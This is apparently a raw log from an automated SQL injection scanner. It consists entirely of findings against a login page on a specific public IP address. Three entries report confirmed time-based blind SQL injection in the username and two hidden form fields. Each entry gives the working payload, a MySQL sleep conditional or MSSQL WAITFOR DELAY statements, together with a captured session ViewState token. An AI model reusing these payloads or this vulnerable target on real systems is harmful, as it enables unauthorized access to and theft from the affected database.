Url: https://13.210.144.183/webclient/Login.xhtml, Injection: InjectionType.Sqli_PostForm_Time, Details: SqliManager FORM delay FOUND! TRUE:'OR(if(1=1,sleep(5),0))OR' ; FALSE:'OR(if(1=2,sleep(5),0))OR', Payload: {'username': "'OR(if(1=1,sleep(5),0))OR'", 'value_hinput': '', 'value': '', 'loginForm_SUBMIT': '1', 'javax.faces.ViewState': 'm3baTSf5FGpzMhoS11Shu+fGM747WL1S3pXoZJ5AqUDrhq4Lx9PFdWCUuh69A6o/rYBA5s1hpB1+T0DFKq+sAWBXH5w='}
Url: https://13.210.144.183/webclient/Login.xhtml, Injection: InjectionType.Sqli_PostForm_Time, Details: SqliManager FORM delay FOUND! TRUE:1'; WAITFOR DELAY '00:00:05 ; FALSE:1'; WAITFOR DELAY '00:00:00, Payload: {'username': '', 'value_hinput': "1'; WAITFOR DELAY '00:00:05", 'value': '', 'loginForm_SUBMIT': '1', 'javax.faces.ViewState': 'm3baTSf5FGpzMhoS11Shu+fGM747WL1S3pXoZJ5AqUDrhq4Lx9PFdWCUuh69A6o/rYBA5s1hpB1+T0DFKq+sAWBXH5w='}
Url: https://13.210.144.183/webclient/Login.xhtml, Injection: InjectionType.Sqli_PostForm_Time, Details: SqliManager FORM delay FOUND! TRUE:1'; WAITFOR DELAY '00:00:05 ; FALSE:1'; WAITFOR DELAY '00:00:00, Payload: {'username': '', 'value_hinput': '', 'value': "1'; WAITFOR DELAY '00:00:05", 'loginForm_SUBMIT': '1', 'javax.faces.ViewState': 'm3baTSf5FGpzMhoS11Shu+fGM747WL1S3pXoZJ5AqUDrhq4Lx9PFdWCUuh69A6o/rYBA5s1hpB1+T0DFKq+sAWBXH5w='}
